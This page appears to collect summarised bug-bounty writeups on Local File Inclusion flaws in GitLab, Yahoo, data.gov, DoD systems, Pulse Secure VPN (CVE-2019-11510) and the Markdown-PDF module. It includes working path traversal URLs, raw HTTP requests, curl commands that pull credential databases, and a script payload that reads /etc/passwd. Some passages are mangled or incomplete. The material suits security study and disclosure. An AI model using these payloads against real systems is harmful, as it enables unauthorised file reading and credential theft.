Local File Inclusion Writeups
Gitlab
Researcher discovered LFI on Gitlab when transferring an issue to a project. By creating an issue in project A with the following payload in the description:
Then transferring that issue from Project A to Project B, this copies the /etc/passwd file to Project B.
Researcher PoC:
PoC removed. Todo add here
The issue occurs on the UploadsRewriter controller. This controller does not validate the file name or path, allowing arbitrary files to be copied using file traversal when moving an issue to another project.
@text.gsub(@pattern) do |markdown|
file = find_file(@source_project, $~[:secret], $~[:file])
break markdown unless file.try(:exists?)
klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader
moved = klass.copy_to(file, target_parent)
...
def find_file(project, secret, file)
uploader = FileUploader.new(project, secret: secret)
uploader.retrieve_from_store!(file)
uploader
endYahoo - URL sub parameter
Requesting a download for any file on https://brandtoolkit.yahoo.com/ will return a download popup. The URL for the popup is marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=. The dlurl parameter contains a URL encoded string 8lcO%3A%2F%2F0w.QbN.0.*Q%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3DaR9UU_hI-q5_UjP.W7U When this is URL decoded three sub parameters are visible z8A, Ujd and hj.
8lcO://0w.QbN.0.*Q:nbbn0/PSID?z8A=AxT_DIfP7_UO9Y6I_hD67IdcI&Ujd=lpxBXLmiKWMPRwUsLpu8cZ&hj=aR9UU_hI-q5_UjP.W7U
The vulnerable parameter to LFI is hj. This parameter is encoded with ecb-encryption with a blocksize of 32 characters-. The researcher wrote a PoC to decrypt/encrypt a string, for convenience researcher provided following payload: /../../../../../../../../etc/passwd and encrypted /../../../../../../../../79d/zGcIwd.
Using the above encrypted payload in the full URL it is possible to retrieve the /etc/passwd file. Full URL with payload:
https://marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=8lcO%3A%2F%2F0w.QbN.0.%2AQ%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3D%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F79d%2FzGcIwdTTS (labs.data.gov)
Researcher discovered limited LFI on endpoint https://labs.data.gov/dashboard/Docs/index, by appending dot-dot-slash URL encoded followed by README it is possible to extract the Readme.md file.
Full URL payload https://labs.data.gov/dashboard/Docs/index/..%2fREADME
The LFI is limited to markdown files. In the code below which controls this functionality the index function in Docs class uses the page parameter which is set in the URL (which researched modified with payload). Then the document path is formed in line 7 which combines the docs_path variable with the user supplied page variable then appended with .md. The markdown string concatenation appendage prevents any other file but markdown from being retrieved.
public function index($page = 'main')
{
$data = array();
$docs_path = ($this->config->item('docs_path')) ? $this->config->item('docs_path') : 'https://raw.githubusercontent.com/GSA/project-open-data-dashboard/master/documentation/';
$docs_path = $docs_path . $page . '.md';
$docs = @file_get_contents($docs_path);DoD LFI
URL LFI using Directory Traversal / Path Traversal with dot-dot-slash characters that are URL encoded to retrieve files from the target system. Retrieving the c:/windows/System32/drivers/etc/hosts as a POC:
GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts HTTP/1.1
Host: ██████████
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: closeThe URL with payload can also just be pasted into a browser:
https://███████/gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hostsAttempting to retrieve Users/Administrator/NTUser.dat to determine if the application is running as an administrator account:
GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fUsers/Administrator/NTUser.dat HTTP/1.1
Host: ████
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
DoD Pulse Secure LFI (CVE-2019-11510)
Researcher discovered vulnerable Pulse Secure SSL VPN server that did not have the patch for CVE-2019-11510. This vulnerability allows an attacker to retrieve backend files such as /etc/passwd. The other files targeted by attackers are the database file /runtime/mtmp/lmdb/dataa/data.mdb which contains usernames and passwords. These credentials could be used to authenticate to the SSL VPN and conduct post breach activities.
//Retrieve the /etc/passwd file
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
//Retrieve the /runtime/mtmp/Imdb/dataa/data.mdb file
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
DoD
Researcher discovered LFI on a DoD application's registration page. The HTTP form body parameter registerUserInfoCommand.nextPageName is vulnerable to LFI, when entering the payload ..%2f..%2f..%2fWEB-INF%2fweb.xml which returns the web.xml file to the user.
Full HTTP body parameters with payload in registerUserInfoCommand.nextPageName:
registerUserInfoCommand.organization=Chantest+Corporation®isterUserInfoCommand.organizationId=49800®isterUserInfoCommand.currPageName=SearchUserOrgInfo.jsp®isterUserInfoCommand.nextPageName=..%2f..%2f..%2fWEB-INF%2fweb.xml®isterUserInfoCommand.prevPageName=jsp%2FRegistration%2FRegisterAccountInfo.jsp®isterUserInfoCommand.submitButton=Choose+This+Organization+and+Continue+%3EResearcher retrieved the following files:
/WEB-INF/spring/mvc-config.xml
/WEB-INF/spring/rest-config.xml
/WEB-INF/classes/compliance/reports/adminRpt.pre.sql
/WEB-INF/classes/compliance/reports/adminRpt.full.sql
/WEB-INF/classes/compliance/reports/complianceStatusRptSql.sql
/WEB-INF/classes/████.propertiesWith the last file containing database credentials:
Test.DB.URL=jdbc:oracle:thin:@localhost:1521:XE
Test.DB.username=██████████
Test.DB.password=██████Markdown-PDF: 3rd Party Node Module
Researcher discovered LFI on a 3rd party Node.js module Markdown-PDF. This module converts markdown to pdf, however it firsts converts markdown to html5 boilerplate in index.html then PhantomJS renders the HTML and saves it to PDF. By rendering the HTML server-side before converting, this allows the input of a malicious markdown file which can retrieve local files. Illustrated below, uploading the markdown file below (test.md) will use document.write to write the contents of /etc/passwd to the markdown which will be returned to the end user after PDF conversion:
# this is h1
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>Last updated
Was this helpful?